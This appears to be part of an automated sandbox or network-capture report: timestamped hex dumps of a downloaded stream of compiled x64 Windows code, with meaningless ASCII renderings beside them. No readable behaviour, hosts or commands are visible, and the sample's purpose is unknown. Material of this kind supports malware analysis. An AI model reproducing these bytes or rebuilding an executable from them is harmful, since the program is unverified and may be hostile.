                                                                            2022-05-23 16:59:08 UTC24INData Raw: 0e c6 84 24 80 09 00 00 c5 c6 84 24 81 09 00 00 ab c6 84 24 82 09 00 00 73 c6 84 24 83 09 00 00 28 c6 84 24 84 09 00 00 89 c6 84 24 85 09 00 00 13 c6 84 24 86 09 00 00 b5 c6 84 24 87 09 00 00 d0 c6 84 24 88 09 00 00 44 c6 84 24 89 09 00 00 15 c6 84 24 8a 09 00 00 5d c6 84 24 8b 09 00 00 a5 c6 84 24 8c 09 00 00 81 c6 84 24 8d 09 00 00 00 c6 84 24 8e 09 00 00 c7 c6 84 24 8f 09 00 00 aa c6 84 24 90 09 00 00 13 c6 84 24 91 09 00 00 2b c6 84 24 92 09 00 00 a4 c6 84 24 93 09 00 00 77 c6 84 24 94 09 00 00 7a c6 84 24 95 09 00 00 86 c6 84 24 96 09 00 00 17 c6 84 24 97 09 00 00 71 c6 84 24 98 09 00 00 b7 c6 84 24 99 09 00 00 9d c6 84 24 9a 09 00 00 34 c6 84 24 9b 09 00 00 e8 c6 84 24 9c 09 00 00 9d c6 84 24 9d 09 00 00 75 c6 84 24 9e 09 00 00 11 c6 84 24 9f 09 00
                                                                            Data Ascii: $$$s$($$$$$D$$]$$$$$$$+$$w$z$$$q$$$4$$$u$$
                                                                            2022-05-23 16:59:08 UTC32INData Raw: 74 bf 04 00 48 8b 4f 40 45 33 c9 45 33 c0 ba 02 10 00 00 ff 15 5f bf 04 00 48 8b c8 e8 5b 28 00 00 48 8b 58 08 e8 52 19 00 00 45 33 c9 48 8b 88 c8 00 00 00 44 8b c6 48 8b d3 48 8b 09 e8 0e f7 ff ff ba 80 00 00 00 48 89 87 20 01 00 00 48 8b 4d 40 44 8d 42 81 4c 8b c8 ff 15 19 bf 04 00 48 8b 5c 24 30 48 8b 7c 24 48 48 8b 74 24 40 48 8b 6c 24 38 48 83 c4 28 c3 cc cc cc cc cc cc cc cc 40 53 48 83 ec 20 48 8b d9 e8 92 d3 00 00 24 03 3c 02 74 13 45 33 c9 48 8b cb 41 8d 51 03 45 8d 41 02 e8 e1 d3 00 00 48 83 c4 20 5b c3 cc cc cc 40 53 48 83 ec 20 48 8b d9 e8 62 d3 00 00 a8 03 74 12 45 33 c9 45 33 c0 48 8b cb 41 8d 51 03 e8 b4 d3 00 00 48 83 c4 20 5b c3 cc cc cc cc cc cc 40 53 48 83 ec 20 48 8b d9 e8 32 d3 00 00 83 e0 03 3c 03 74 13 ba 03 00 00 00 45 33 c9 48 8b
                                                                            Data Ascii: tHO@E3E3_H[(HXRE3HDHHH HM@DBLH\$0H|$HHt$@Hl$8H(@SH H$<tE3HAQEAH [@SH HbtE3E3HAQH [@SH H2<tE3H
                                                                            2022-05-23 16:59:08 UTC40INData Raw: df 45 1b c0 41 83 e0 08 41 0f ba e8 0a ff 15 15 9f 04 00 eb 44 48 8b 4b 20 48 85 c9 75 06 e8 21 b9 00 00 cc 48 8b 49 40 45 33 c9 45 33 c0 ba 87 00 00 00 ff 15 3f 9f 04 00 48 0f ba e0 0d 73 19 48 8b 4b 20 4c 8b c7 45 33 c9 48 8b 49 40 ba f1 00 00 00 ff 15 1f 9f 04 00 48 83 c4 28 5f 5b c3 40 53 57 48 83 ec 38 48 85 d2 48 8b fa 48 8b d9 75 06 e8 cd b8 00 00 cc 48 8b 49 10 48 85 c9 74 4d 48 83 7b 18 00 75 5e 8b 53 0c 48 8b 49 08 41 b8 00 04 00 00 ff 15 7d 9e 04 00 8b 53 0c 25 fb f6 ff ff 3b 53 30 72 06 e8 97 b8 00 00 cc 48 8b 4b 10 44 8b 4b 08 0f ba e8 0a 48 8b 49 08 44 8b c0 48 89 7c 24 20 ff 15 44 9e 04 00 eb 18 48 8b 4b 20 48 85 c9 75 06 e8 68 b8 00 00 cc 48 8b 49 40 e8 46 ed 01 00 48 83 c4 38 5f 5b c3 cc cc cc 40 53 55 56 57 41 54 48 81 ec c0 00 00 00 48
                                                                            Data Ascii: EAADHK Hu!HI@E3E3?HsHK LE3HI@H(_[@SWH8HHHuHIHtMH{u^SHIA}S%;S0rHKDKHIDH|$ DHK HuhHI@FH8_[@SUVWATHH
                                                                            2022-05-23 16:59:08 UTC48INData Raw: 06 e8 46 f7 ff ff 90 48 8b c3 48 83 c4 30 5b c3 cc cc cc cc 40 55 48 83 ec 20 48 8b ea 48 8b 4d 40 e8 76 fe ff ff 48 83 c4 20 5d c3 48 89 4c 24 08 53 48 83 ec 30 48 c7 44 24 20 fe ff ff ff 48 8b d9 48 8d 05 cf 8e 04 00 48 89 01 e8 ff fd ff ff 48 8b d0 48 8b 4b 20 ff 15 7a 7e 04 00 90 48 8b cb 48 83 c4 30 5b e9 30 fe ff ff 40 55 48 83 ec 20 48 8b ea 48 8b 4d 40 e8 1e fe ff ff 48 83 c4 20 5d c3 48 89 4c 24 08 53 48 83 ec 30 48 c7 44 24 20 fe ff ff ff 48 8b d9 48 c7 41 08 00 00 00 00 48 c7 41 10 00 00 00 00 c7 41 18 00 00 00 00 48 8d 05 b0 8f 04 00 48 89 01 48 8b 4a 40 48 89 4b 20 48 8d 53 28 ff 15 53 7d 04 00 48 8b d0 48 8b cb e8 2c fd ff ff 85 c0 75 06 e8 6b f6 ff ff 90 48 8b c3 48 83 c4 30 5b c3 cc cc cc cc cc cc cc cc cc 40 55 48 83 ec 20 48 8b ea 48 8b
                                                                            Data Ascii: FHH0[@UH HHM@vH ]HL$SH0HD$ HHHHHK z~HH0[0@UH HHM@H ]HL$SH0HD$ HHAHAAHHHJ@HK HS(S}HH,ukHH0[@UH HH
                                                                            2022-05-23 16:59:08 UTC56INData Raw: cb 41 ff d0 33 c0 48 83 c4 28 5f 5b c3 cc cc cc 40 53 55 56 57 48 83 ec 28 48 8b e9 48 8b 49 40 49 8b d8 e8 90 b0 01 00 48 85 c0 48 8b f0 74 55 48 8b c8 ff 15 7f 5e 04 00 48 85 db 0f b7 f8 74 3f 83 3b 38 72 3a 48 8b 45 40 83 4b 04 01 45 33 c9 45 33 c0 ba 87 00 00 00 48 8b ce 48 89 43 08 48 89 73 10 48 c7 43 30 ff ff ff ff ff 15 06 5f 04 00 48 0f ba e0 0d 72 07 81 4b 04 02 00 00 80 48 8b c7 eb 07 48 c7 c0 ff ff ff ff 48 83 c4 28 5f 5e 5d 5b c3 cc cc cc 66 90 48 83 79 10 00 74 20 39 11 75 12 44 39 41 04 75 0c 44 3b 49 08 72 06 44 3b 49 0c 76 06 48 83 c1 20 eb dd 48 8b c1 c3 33 c0 c3 40 53 55 56 57 48 83 ec 38 48 8b 01 48 8b d9 48 8d 4c 24 60 48 89 4c 24 20 48 8b cb 49 8b f9 49 8b f0 8b ea 48 c7 44 24 60 00 00 00 00 ff 90 18 02 00 00 85 c0 75 16 48 8b 03 4c
                                                                            Data Ascii: A3H(_[@SUVWH(HHI@IHHtUH^Ht?;8r:HE@KE3E3HHCHsHC0_HrKHHH(_^][fHyt 9uD9AuD;IrD;IvH H3@SUVWH8HHHL$`HL$ HIIHD$`uHL
                                                                            2022-05-23 16:59:08 UTC64INData Raw: 74 0c 48 8b 54 24 28 33 c9 e8 92 88 ff ff 8b c3 48 83 c4 60 5f 5e 5b c3 cc cc cc cc cc cc cc cc 40 55 48 83 ec 20 48 8b ea 48 8d 4d 28 e8 ae ed ff ff 48 83 c4 20 5d c3 40 53 48 83 ec 40 48 c7 44 24 20 fe ff ff ff 48 8d 59 98 48 8b 53 38 48 8d 4c 24 28 e8 9f 99 ff ff 90 48 8b cb e8 6e ad 01 00 8b d8 83 7c 24 30 00 74 0c 48 8b 54 24 28 33 c9 e8 29 88 ff ff 8b c3 48 83 c4 40 5b c3 cc cc cc cc cc cc cc cc cc 40 55 48 83 ec 20 48 8b ea 48 8d 4d 28 e8 46 ed ff ff 48 83 c4 20 5d c3 40 53 48 83 ec 40 48 c7 44 24 20 fe ff ff ff 48 8d 59 98 48 8b 53 38 48 8d 4c 24 28 e8 37 99 ff ff 90 48 8b cb e8 aa ad 01 00 8b d8 83 7c 24 30 00 74 0c 48 8b 54 24 28 33 c9 e8 c1 87 ff ff 8b c3 48 83 c4 40 5b c3 cc cc cc cc cc cc cc cc cc 40 55 48 83 ec 20 48 8b ea 48 8d 4d 28 e8 de
                                                                            Data Ascii: tHT$(3H`_^[@UH HHM(H ]@SH@HD$ HYHS8HL$(Hn|$0tHT$(3)H@[@UH HHM(FH ]@SH@HD$ HYHS8HL$(7H|$0tHT$(3H@[@UH HHM(
                                                                            2022-05-23 16:59:08 UTC72INData Raw: 02 48 8b 49 10 4c 8d 4c 24 20 49 89 01 48 8b 42 08 49 89 41 08 48 8b 42 10 48 8d 54 24 20 49 89 41 10 48 8b 01 ff 50 58 48 83 c4 48 c3 cc cc cc 48 83 ec 48 48 83 79 10 00 75 07 b8 08 01 01 80 eb 36 4d 85 c0 75 07 b8 03 40 00 80 eb 2a 48 8b 02 48 8b 49 10 4c 8d 4c 24 20 49 89 01 48 8b 42 08 49 89 41 08 48 8b 42 10 48 8d 54 24 20 49 89 41 10 48 8b 01 ff 50 60 48 83 c4 48 c3 cc cc cc 48 83 ec 48 48 83 79 10 00 75 07 b8 08 01 01 80 eb 36 4d 85 c0 75 07 b8 03 40 00 80 eb 2a 48 8b 02 48 8b 49 10 4c 8d 4c 24 20 49 89 01 48 8b 42 08 49 89 41 08 48 8b 42 10 48 8d 54 24 20 49 89 41 10 48 8b 01 ff 50 68 48 83 c4 48 c3 cc cc cc 48 83 ec 48 48 83 79 10 00 75 07 b8 08 01 01 80 eb 36 4d 85 c0 75 07 b8 03 40 00 80 eb 2a 48 8b 02 48 8b 49 10 4c 8d 4c 24 20 49 89 01 48 8b
                                                                            Data Ascii: HILL$ IHBIAHBHT$ IAHPXHHHHHyu6Mu@*HHILL$ IHBIAHBHT$ IAHP`HHHHHyu6Mu@*HHILL$ IHBIAHBHT$ IAHPhHHHHHyu6Mu@*HHILL$ IH
                                                                            2022-05-23 16:59:08 UTC80INData Raw: 87 e4 02 00 00 41 0f bf fc 49 c1 ec 10 45 0f bf e4 48 83 f9 2a 75 1a 48 8b ce e8 f1 cb ff ff 4c 8b c8 45 8b c4 8b d7 48 8b cd ff d3 e9 b8 02 00 00 45 8b c4 8b d7 48 8b cd ff d3 e9 a9 02 00 00 49 8b c4 48 c1 e8 10 0f b7 f8 48 8b ce e8 be cb ff ff 4c 8b c0 41 0f b7 d4 44 8b cf 48 8b cd ff d3 e9 83 02 00 00 48 8b cd ff d3 48 89 44 24 30 e9 74 02 00 00 49 8b cc e8 93 cb ff ff 48 8b d0 4c 8b c6 48 8b cd ff d3 e9 5c 02 00 00 0f bf c6 89 44 24 38 48 c1 ee 10 0f bf c6 89 44 24 3c 49 8b cc e8 69 cb ff ff 48 8b d0 4c 8b 44 24 38 48 8b cd ff d3 e9 30 02 00 00 48 8b c6 48 c1 e8 10 0f b7 f8 0f b7 f6 49 8b cc e8 42 cb ff ff 48 8b d0 44 8b cf 44 8b c6 48 8b cd ff d3 e9 08 02 00 00 48 8b d6 48 8b cd ff d3 e9 fb 01 00 00 48 83 f9 33 0f 87 c6 00 00 00 48 83 f9 33 0f 84 af
                                                                            Data Ascii: AIEH*uHLEHEHIHHLADHHHD$0tIHLH\D$8HD$<IiHLD$8H0HHIBHDDHHHH3H3
                                                                            2022-05-23 16:59:08 UTC88INData Raw: 00 8b 8c 24 80 00 00 00 8b c3 03 ce 33 f6 45 85 ff 0f 45 84 24 9c 00 00 00 89 8c 24 80 00 00 00 3b c1 7c 61 44 8b e5 83 c5 01 48 63 c5 48 3b 87 18 01 00 00 0f 8c 20 ff ff ff 41 8d 74 24 01 48 8d 8f 08 01 00 00 41 b9 01 00 00 00 48 63 de 45 33 c0 48 8b d3 e8 f6 6a 01 00 48 8d 8f 08 01 00 00 41 b9 01 00 00 00 4d 8b c6 48 8b d3 e8 de 6a 01 00 8b c6 48 83 c4 38 41 5f 41 5e 41 5d 41 5c 5f 5e 5d 5b c3 85 ed 75 1b 41 8d 44 24 01 48 8d 8f 08 01 00 00 44 8d 4d 01 48 63 d0 45 33 c0 e8 ac 6a 01 00 41 8d 5c 24 01 48 8d 8f 08 01 00 00 41 b9 01 00 00 00 48 63 d3 4d 8b c6 e8 8f 6a 01 00 8b c3 eb af cc cc cc 48 83 ec 28 41 8d 40 f6 83 f8 07 77 07 b8 03 00 00 00 eb 05 e8 23 aa ff ff 48 83 c4 28 c3 cc cc 40 53 55 56 57 48 83 ec 28 83 fa 02 49 8b d8 8b f2 48 8b f9 75 6a e8
                                                                            Data Ascii: $3EE$$;|aDHcH; At$HAHcE3HjHAMHjH8A_A^A]A\_^][uAD$HDMHcE3jA\$HAHcMjH(A@w#H(@SUVWH(IHuj
                                                                            2022-05-23 16:59:08 UTC96INData Raw: c3 cc cc cc 40 53 55 56 57 41 54 48 83 ec 40 45 33 c0 48 8b d9 48 8b 49 40 48 8b fa 4c 8b ca 41 8d 50 46 ff 15 97 bd 03 00 f6 47 20 01 0f 85 0e 01 00 00 48 8b 4b 40 48 8d 54 24 30 ff 15 c6 bd 03 00 44 8b 67 18 8b 6c 24 38 8b 74 24 3c 2b 6c 24 30 8b 7f 1c 2b 74 24 34 44 3b e5 74 6f 0f ba a3 dc 00 00 00 0a 73 65 41 8b d4 48 8d 4c 24 30 45 8b cc 2b 15 1f c0 05 00 45 33 c0 89 7c 24 20 ff 15 6a bb 03 00 48 8b 4b 40 48 8d 54 24 30 41 b8 01 00 00 00 ff 15 d5 be 03 00 8b d5 48 8d 4c 24 30 2b 15 f0 bf 05 00 44 8b cd 45 33 c0 89 7c 24 20 ff 15 38 bb 03 00 48 8b 4b 40 48 8d 54 24 30 41 b8 01 00 00 00 ff 15 a3 be 03 00 3b fe 74 70 0f ba a3 dc 00 00 00 0b 73 66 44 8b c7 48 8d 4c 24 30 45 8b cc 44 2b 05 af bf 05 00 33 d2 89 7c 24 20 ff 15 f7 ba 03 00 48 8b 4b 40 48 8d
                                                                            Data Ascii: @SUVWATH@E3HHI@HLAPFG HK@HT$0Dgl$8t$<+l$0+t$4D;toseAHL$0E+E3|$ jHK@HT$0AHL$0+DE3|$ 8HK@HT$0A;tpsfDHL$0ED+3|$ HK@H
                                                                            2022-05-23 16:59:08 UTC104INData Raw: f6 8d 4e 48 48 8b d8 ff 15 03 9e 03 00 45 33 c9 45 33 c0 8b c8 48 8d 05 0c e0 03 00 33 d2 48 89 44 24 68 89 74 24 60 89 74 24 58 89 74 24 50 89 74 24 48 c7 44 24 40 02 00 00 00 89 74 24 38 89 74 24 30 89 74 24 28 c7 44 24 20 90 01 00 00 ff 15 83 94 03 00 48 85 c0 48 8b f8 74 0f 48 8b d0 48 8b cb ff 15 e7 94 03 00 48 8b f0 ba 36 00 00 00 4c 8d 0d b4 40 05 00 48 8b cb 44 8b c2 ff 15 4c 94 03 00 48 85 ff 74 15 48 8b d6 48 8b cb ff 15 bb 94 03 00 48 8b cf ff 15 fa 94 03 00 48 8b d3 33 c9 ff 15 37 9e 03 00 8b 05 7d 40 05 00 48 83 c4 70 5f 5e 5b c3 cc 48 89 4c 24 08 53 48 83 ec 30 48 c7 44 24 20 fe ff ff ff 48 8b d9 48 8d 05 9b df 03 00 48 89 01 48 81 c1 10 01 00 00 e8 04 ee 00 00 48 8b 8b 30 01 00 00 48 85 c9 74 0b 48 8b 01 ba 01 00 00 00 ff 50 08 c7 83 cc 00
                                                                            Data Ascii: NHHE3E3H3HD$ht$`t$Xt$Pt$HD$@t$8t$0t$(D$ HHtHHH6L@HDLHtHHHH37}@Hp_^[HL$SH0HD$ HHHHH0HtHP
                                                                            2022-05-23 16:59:08 UTC112INData Raw: 33 c9 48 85 c0 0f 95 c1 85 c9 75 0b b9 05 40 00 80 e8 2a c9 fe ff cc 48 8b 00 49 8b cb ff 50 18 48 83 c0 18 48 89 44 24 40 e8 0a c5 00 00 4c 8b d8 33 c9 48 85 c0 0f 95 c1 85 c9 75 0b b9 05 40 00 80 e8 f9 c8 fe ff cc 48 8b 00 49 8b cb ff 50 18 48 83 c0 18 48 89 44 24 38 8b 57 08 83 ea 01 48 8d 84 24 b8 00 00 00 48 89 44 24 20 4c 8d 4c 24 30 4c 8d 84 24 a8 00 00 00 48 8b cd e8 f6 e4 ff ff 8b 8c 24 a8 00 00 00 e8 5a c3 00 00 48 85 c0 0f 84 9e 00 00 00 44 8b 84 24 a8 00 00 00 48 8b d0 48 8d 4c 24 40 e8 00 cf fe ff 85 c0 0f 84 81 00 00 00 66 41 b9 0a 00 41 b8 01 00 00 00 48 8b 54 24 40 48 8d 4c 24 38 e8 2e c3 00 00 48 8b 4c 24 38 8b 51 f0 ff 15 dc 79 03 00 48 85 c0 75 06 e8 ea c8 fe ff cc 48 89 06 48 8b 54 24 38 48 83 c2 e8 b8 ff ff ff ff f0 0f c1 42 10 83 c0
                                                                            Data Ascii: 3Hu@*HIPHHD$@L3Hu@HIPHHD$8WH$HD$ LL$0L$H$ZHD$HHL$@fAAHT$@HL$8.HL$8QyHuHHT$8HB
                                                                            2022-05-23 16:59:08 UTC120INData Raw: e7 0f 84 58 01 00 00 49 8b 4c 24 40 ff 15 ae 5e 03 00 44 0f b7 f8 49 8d 87 00 18 ff ff 48 83 f8 1f 77 65 41 8d 8f 00 18 ff ff b8 01 00 00 00 d3 e0 49 8b cc 89 84 24 80 00 00 00 49 8b 04 24 ff 90 a8 02 00 00 85 c0 74 08 44 0b ac 24 80 00 00 00 49 8b 04 24 49 8b cc ff 90 b8 02 00 00 85 c0 74 09 49 81 ff 1f e8 00 00 74 1d 44 8b 47 10 41 b9 01 00 00 00 49 8b d4 44 23 84 24 80 00 00 00 48 8b cb e8 58 f8 ff ff 45 33 ff 49 3b f7 0f 85 56 ff ff ff 45 3b f7 44 89 6f 10 0f 84 ca 00 00 00 48 8b 47 20 33 d2 48 8b cb 48 89 83 38 01 00 00 e8 2a e3 ff ff 8b 17 48 8b 4b 40 ff 15 36 5c 03 00 33 d2 48 8b c8 48 8b e8 ff 15 60 5b 03 00 48 8b 4b 40 ff 15 7e 5c 03 00 49 3b c7 48 89 47 08 74 23 48 8b 4b 40 33 d2 44 8d 42 01 ff 15 7d 5e 03 00 48 8b 4b 40 33 d2 ff 15 b1 5a 03 00
                                                                            Data Ascii: XIL$@^DIHweAI$I$tD$I$ItItDGAID#$HXE3I;VE;DoHG 3HH8*HK@6\3HH`[HK@~\I;HGt#HK@3DB}^HK@3Z
                                                                            2022-05-23 16:59:08 UTC128INData Raw: 50 48 89 44 24 20 4c 8d 4c 24 70 4c 8d 44 24 54 8b d3 48 8b 4c 24 68 e8 5c a5 ff ff f6 44 24 70 01 0f 85 c5 02 00 00 c7 84 24 84 01 00 00 62 01 00 00 8b 5c 24 54 8b cb e8 ab 83 00 00 48 85 c0 74 15 44 8b c3 48 8b d0 48 8d 4c 24 60 e8 5a 8f fe ff 48 8b 7c 24 60 66 41 b9 0a 00 41 b8 01 00 00 00 48 8b d7 48 8d 4c 24 58 e8 8d 83 00 00 b9 10 00 00 00 e8 e3 87 fe ff 48 85 c0 74 14 48 c7 40 08 00 00 00 00 48 8d 0d 4b 51 03 00 48 89 08 eb 02 33 c0 8b 94 24 c0 02 00 00 4c 8b c0 48 8d 4c 24 78 e8 64 ca 00 00 48 8b 9c 24 b8 00 00 00 48 8b 5b 08 e8 cb 98 fe ff 48 8b 88 c8 00 00 00 4c 8d 8c 24 e0 01 00 00 44 8b 44 24 50 48 8b d3 48 8b 09 e8 84 e8 ff ff 48 8d 94 24 f8 01 00 00 48 8d 8c 24 a0 00 00 00 ff 15 aa 3e 03 00 44 8b 9c 24 a4 00 00 00 41 f7 db 8b 94 24 a0 00 00
                                                                            Data Ascii: PHD$ LL$pLD$THL$h\D$p$b\$THtDHHL$`ZH|$`fAAHHL$XHtH@HKQH3$LHL$xdH$H[HL$DD$PHHH$H$>D$A$
                                                                            2022-05-23 16:59:08 UTC136INData Raw: 94 24 30 02 00 00 48 8b cb ff 90 a0 00 00 00 85 f6 74 16 e8 74 79 fe ff 48 8b 53 48 48 8b 48 08 48 8b 01 ff 90 18 01 00 00 48 8b 8c 24 30 04 00 00 48 33 cc e8 f7 60 01 00 48 81 c4 40 04 00 00 5f 5e 5b c3 40 53 55 56 57 41 54 48 81 ec 60 02 00 00 48 c7 44 24 30 fe ff ff ff 48 8b 05 76 c8 04 00 48 33 c4 48 89 84 24 50 02 00 00 45 8b e1 49 8b f8 48 8b ea 8b 9c 24 b0 02 00 00 89 5c 24 28 e8 ba 64 00 00 4c 8b d8 33 c9 48 85 c0 0f 95 c1 85 c9 75 0b b9 05 40 00 80 e8 a9 68 fe ff cc 48 8b 00 49 8b cb ff 50 18 48 83 c0 18 48 89 44 24 20 48 85 ff 0f 84 75 01 00 00 48 8d 15 3e 29 03 00 48 8b cf e8 f6 6b 00 00 85 c0 74 2c 48 8b 54 24 20 48 83 c2 e8 b8 ff ff ff ff f0 0f c1 42 10 83 c0 ff 85 c0 0f 8f ab 01 00 00 48 8b 0a 48 8b 01 ff 50 08 e9 9d 01 00 00 48 8d 15 af 95
                                                                            Data Ascii: $0HttyHSHHHHH$0H3`H@_^[@SUVWATH`HD$0HvH3H$PEIH$\$(dL3Hu@hHIPHHD$ HuH>)Hkt,HT$ HBHHPH
                                                                            2022-05-23 16:59:08 UTC144INData Raw: 00 48 8b 8b a8 00 00 00 e8 23 4a 01 00 48 8b 8b c0 00 00 00 e8 17 4a 01 00 48 8b 8b c8 00 00 00 e8 0b 4a 01 00 48 8b 8b d0 00 00 00 e8 ff 49 01 00 48 c7 43 58 00 00 00 00 48 8b cb 48 83 c4 38 5e 5b e9 0d f3 ff ff cc cc cc cc cc 40 55 48 83 ec 20 48 8b ea 48 8b 4d 50 e8 f6 f2 ff ff 48 83 c4 20 5d c3 40 53 48 83 ec 20 48 83 b9 10 01 00 00 00 48 8b d9 74 0d 48 8b 89 10 01 00 00 48 8b 01 ff 50 28 44 8b 8b 24 01 00 00 45 85 c9 74 16 4c 8d 05 29 58 03 00 48 8d 15 0a 58 03 00 48 8b cb e8 1e d5 00 00 48 83 c4 20 5b c3 40 53 57 48 83 ec 28 48 8b 81 18 01 00 00 33 db 48 8b f9 48 3b c3 74 0c 83 78 14 06 74 18 83 78 14 05 74 12 e8 b7 58 fe ff 38 58 28 75 08 48 8b cf e8 82 ff ff ff 48 8b 87 30 01 00 00 48 3b c3 74 02 ff d0 48 8b 8f f8 00 00 00 48 3b cb 74 0d ff 15 1e
                                                                            Data Ascii: H#JHJHJHIHCXHH8^[@UH HHMPH ]@SH HHtHHP(D$EtL)XHXHH [@SWH(H3HH;txtxtX8X(uHH0H;tHH;t
                                                                            2022-05-23 16:59:08 UTC152INData Raw: d4 dd 02 00 0f ba e0 1e 73 11 48 8b cb ff 15 4d df 02 00 48 85 c0 48 8b d8 75 db 48 85 db 48 8b fb 48 8b c3 74 11 48 8b c8 48 8b f8 ff 15 2e df 02 00 48 85 c0 75 ef 48 85 ed 75 11 48 85 db 74 0c 48 8b cb ff 15 8e dc 02 00 48 8b d8 48 85 f6 74 2e 48 85 ff 74 22 48 8b cf ff 15 d0 db 02 00 85 c0 74 15 48 3b fb 74 10 33 d2 48 8b cf 48 89 3e ff 15 21 df 02 00 eb 07 48 c7 06 00 00 00 00 48 8b c3 48 83 c4 28 5f 5e 5d 5b c3 8b ca e9 a9 fe ff ff cc 40 53 55 56 57 41 54 41 55 41 57 48 81 ec 50 02 00 00 48 8b 05 2b 88 04 00 48 33 c4 48 89 84 24 40 02 00 00 48 8b f1 33 c9 45 8b e9 41 8b f8 4c 8b fa e8 71 fe ff ff 48 8d 54 24 28 33 c9 e8 c5 fe ff ff 48 3b 44 24 28 4c 8b e0 74 0e ba 01 00 00 00 48 8b c8 ff 15 a9 de 02 00 33 ed 48 8d 54 24 20 49 8b cc 48 8b dd 89 6c 24
                                                                            Data Ascii: sHMHHuHHHtHH.HuHuHtHHHt.Ht"HtH;t3HH>!HHH(_^][@SUVWATAUAWHPH+H3H$@H3EALqHT$(3H;D$(LtH3HT$ IHl$
                                                                            2022-05-23 16:59:08 UTC160INData Raw: 8b 4b 18 48 85 c9 74 09 3b 73 10 7d 04 4c 89 2c f1 48 8d 4f 28 ff 15 e5 b8 02 00 eb 0a 48 8d 4f 28 ff 15 d9 b8 02 00 48 83 c4 30 41 5d 41 5c 5f 5e 5b c3 cc 48 89 54 24 10 55 48 83 ec 20 48 8b ea 48 8b 4d 60 48 83 c1 28 ff 15 b1 b8 02 00 33 d2 33 c9 e8 58 19 01 00 90 48 83 c4 20 5d c3 cc 40 53 48 83 ec 20 f6 c2 01 48 8b d9 74 0b 48 85 c9 74 06 ff 15 8f b8 02 00 48 8b c3 48 83 c4 20 5b c3 cc cc 40 53 55 56 57 41 54 48 83 ec 30 48 c7 44 24 20 fe ff ff ff 4c 8b e2 48 8b f9 33 c0 48 85 d2 0f 95 c0 85 c0 75 06 e8 a5 d8 fe ff cc 83 39 00 75 44 48 8b 05 44 bc 04 00 48 85 c0 75 24 48 8d 0d 48 bc 04 00 48 89 4c 24 68 e8 9a fb ff ff 90 48 89 05 26 bc 04 00 48 85 c0 75 06 e8 70 d8 fe ff cc 48 8b c8 e8 cf fb ff ff 89 07 85 c0 75 06 e8 5c d8 fe ff cc 48 63 1f 48 8b 2d
                                                                            Data Ascii: KHt;s}L,HO(HO(H0A]A\_^[HT$UH HHM`H(33XH ]@SH HtHtHH [@SUVWATH0HD$ LH3Hu9uDHDHu$HHHL$hH&HupHu\HcH-
                                                                            2022-05-23 16:59:08 UTC168INData Raw: 8b ce e8 4d e8 fd ff 48 8b 47 30 48 83 c4 40 5f 5e 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 40 55 48 83 ec 20 48 8b ea 48 8b 4d 68 e8 6e e8 fd ff 48 83 c4 20 5d c3 40 53 48 83 ec 20 48 8b d9 b9 01 00 00 00 e8 35 ff ff ff 48 8b d3 48 8b c8 48 83 c4 20 5b e9 31 fb ff ff cc 40 53 48 83 ec 20 48 8b d9 e8 72 f9 fd ff 48 8b 48 30 33 c0 48 3b c8 74 0c 48 83 c1 30 48 8b d3 e8 4f e6 ff ff 48 83 c4 20 5b c3 cc 40 53 48 83 ec 20 48 85 d2 48 8b d9 75 04 33 c0 eb 23 48 89 51 08 b9 01 00 00 00 e8 d8 fe ff ff 48 8b 53 08 48 8d 48 30 e8 63 e8 ff ff 48 89 18 b8 01 00 00 00 48 83 c4 20 5b c3 cc 40 53 57 48 83 ec 28 48 8b 79 08 48 8b d9 48 85 ff 74 1b e8 00 f9 fd ff 48 8b 48 30 48 85 c9 74 0d 48 8b 53 08 48 83 c1 30 e8 52 e6 ff ff 48 c7 43 08 00 00 00 00 48 8b c7 48 83
                                                                            Data Ascii: MHG0H@_^[@UH HHMhnH ]@SH H5HHH [1@SH HrHH03H;tH0HOH [@SH HHu3#HQHSHH0cHH [@SWH(HyHHtHH0HtHSH0RHCHH
                                                                            2022-05-23 16:59:08 UTC176INData Raw: 24 74 89 47 40 8b 44 24 20 89 47 4c 8b 44 24 24 89 47 50 33 d2 48 8b cf 48 89 5f 08 e8 8f fb ff ff 48 83 c4 58 5f 5b c3 40 53 57 48 83 ec 28 ba 01 00 00 00 48 8b d9 e8 74 fb ff ff ff 15 4e 7b 02 00 ff 15 78 7b 02 00 48 8b c8 e8 c8 4b fe ff 33 c9 48 8b f8 ff 15 15 7f 02 00 48 8b 93 98 00 00 00 48 85 d2 74 19 48 8b 52 08 48 8b 4f 40 ff 15 73 7e 02 00 48 c7 83 98 00 00 00 00 00 00 00 48 83 c4 28 5f 5b c3 cc 40 53 57 48 83 ec 38 48 8b d9 e8 91 ff ff ff 8b 93 84 00 00 00 85 d2 0f 84 8b 00 00 00 48 8b cb e8 ff f7 ff ff f7 83 84 00 00 00 00 50 00 00 48 8d 4b 3c 48 8d 53 2c 48 8b f8 48 0f 45 d1 f3 0f 6f 02 f3 0f 7f 44 24 20 48 8b 48 40 ff 15 ee 7d 02 00 0f b7 d0 8d 8a e5 17 ff ff 83 f9 03 77 1f f3 0f 6f 44 24 20 89 93 a8 00 00 00 48 8d 93 ac 00 00 00 48 8b cf f3
                                                                            Data Ascii: $tG@D$ GLD$$GP3HH_HX_[@SWH(HtN{x{HK3HHHtHRHO@s~HH(_[@SWH8HHPHK<HS,HHEoD$ HH@}woD$ HH
                                                                            2022-05-23 16:59:08 UTC184INData Raw: 5e 5b c3 cc 40 53 48 83 ec 20 48 8b d9 e8 9a fc ff ff 48 c7 43 30 00 00 00 00 48 83 c4 20 5b c3 45 85 c0 0f 84 58 01 00 00 53 55 56 57 41 54 41 55 48 83 ec 38 48 85 d2 41 8b f0 48 8b ea 48 8b f9 0f 84 2e 01 00 00 8b 41 20 f7 d0 a8 01 75 0f 48 8b 51 18 b9 02 00 00 00 e8 b2 f9 ff ff cc 4c 8d 69 40 45 8b 65 00 49 8b 55 00 44 2b 61 38 48 8b 49 38 45 3b c4 45 0f 42 e0 48 2b d1 4c 8b c5 45 8b cc 41 8b dc e8 c5 aa 00 00 85 c0 74 26 83 f8 0c 74 1b 83 f8 16 74 10 83 f8 22 74 0b 83 f8 50 74 12 e8 ac 78 fe ff cc e8 a6 78 fe ff cc e8 58 78 fe ff cc 48 01 5f 38 48 03 eb 41 2b f4 0f 84 b0 00 00 00 48 8b cf e8 df fb ff ff 48 8b 4f 30 33 d2 8b c6 8b de f7 77 28 48 8b 01 2b da 48 8b d5 44 8b c3 ff 50 70 44 8b db 2b f3 49 03 eb 83 7f 0c 00 74 27 48 8b 4f 30 44 8b 47 28 4c
